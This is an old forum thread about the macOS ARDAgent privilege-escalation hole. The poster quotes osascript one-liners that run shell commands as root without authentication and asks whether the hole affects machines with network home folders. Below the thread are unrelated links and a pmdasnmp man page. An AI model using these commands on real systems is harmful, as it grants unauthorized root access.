06-19-2008
ARD Agent vulnerability
today an anonymous slashdot user posted this little shell command, that uses the ARDAgent to gain root access, without ever needing to authenticate.
the script is:
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
Can be used to things like:
osascript -e 'tell app "ARDAgent" to do shell script "scutil --set ComputerName SomeName"'
that would normally require authentication.
It has been tested by quite a few people, and has been found only to work you are physically at a computer and its logged in.
However where I work we use Network Shares as our home folder, and this hack doesnt seem to work. And I just wanted to make sure that there was no way it would work.
When I run the command:
osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
I get:
execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)
Anyone thinks its possible?
5 More Discussions You Might Find Interesting
1. UNIX for Dummies Questions & Answers
Hello,
on Solaris 5.8 I've installed SunMgtCenter to get the time agent;
it's under /opt/SUNWsymon/sbin/es-start -a
it's in ps -ef | grep agent
...but it doesn't work; the machine is always in alarm cause the time is different of the clock server;
is it clear enough ?
tks
cc (0 Replies)
Discussion started by: Carmen123
0 Replies
2. IP Networking
Hi,
I am really new in linux and SNMP.
I have a SNMP agent in Linux (net-snmp). I have my MIB
in the /usr/share/mibs directory, and I didn't manage to understand where and how do I put the values of the fields in the MIB? The values are static, so the agent need to return the same value in... (0 Replies)
Discussion started by: linuxbegginer
0 Replies
3. UNIX for Dummies Questions & Answers
Hi,
Please can someone explain me about the " perform agent " on UNIX .
Thanx (1 Reply)
Discussion started by: reply2soumya
1 Replies
4. UNIX for Dummies Questions & Answers
Hi all,
I'm new to vcs. I have a doubt. I need to know, what will happen if an agent is stopped while reources being online. Eg.. while the oracle agent is stopped, will all the oracle resources will become offline..
Advanced thanks (1 Reply)
Discussion started by: sunshine12
1 Replies
5. Solaris
Client has got a few machines with logical domains on.
But I can't see the the ovs-agent service?
Quite possibly I guess this has been set up with just logical domains. With no agent.
Do you need to use the agent only if planning to manage with OV Manager? (6 Replies)
Discussion started by: psychocandy
6 Replies
LEARN ABOUT CENTOS
pmdasnmp
PMDASNMP(1) Performance Co-Pilot PMDASNMP(1)
NAME
pmdasnmp - Gateway from SNMP to PCP (PMDA)
DESCRIPTION
pmdasnmp is a Performance Metrics Domain Agent (PMDA) which provides a generic gateway from PCP queries from a PCP client to SNMP queries
to one or more SNMP agents.
INSTALLATION
If you want access to the SNMP gateway performance metrics, do the following as root:
# cd $PCP_PMDAS_DIR/snmp
# ./Install
If you want to undo the installation, do the following as root:
# cd $PCP_PMDAS_DIR/snmp
# ./Remove
pmdasnmp is launched by pmcd(1) and should never be executed directly. The Install and Remove scripts notify pmcd(1) when the agent is
installed or removed.
CONFIGURATION
TODO: define config file format here - map/set/host/... etc
FILES
$PCP_PMDAS_DIR/snmp/snmp.conf
optional configuration file for pmdasnmp
$PCP_PMDAS_DIR/snmp/Install
installation script for the pmdasnmp agent
$PCP_PMDAS_DIR/snmp/Remove
undo installation script for the pmdasnmp agent
$PCP_LOG_DIR/pmcd/snmp.log
default log file for error and warn() messages from pmdasnmp
SEE ALSO
pmcd(1) and SNMP
3.8.10 Performance Co-Pilot PMDASNMP(1)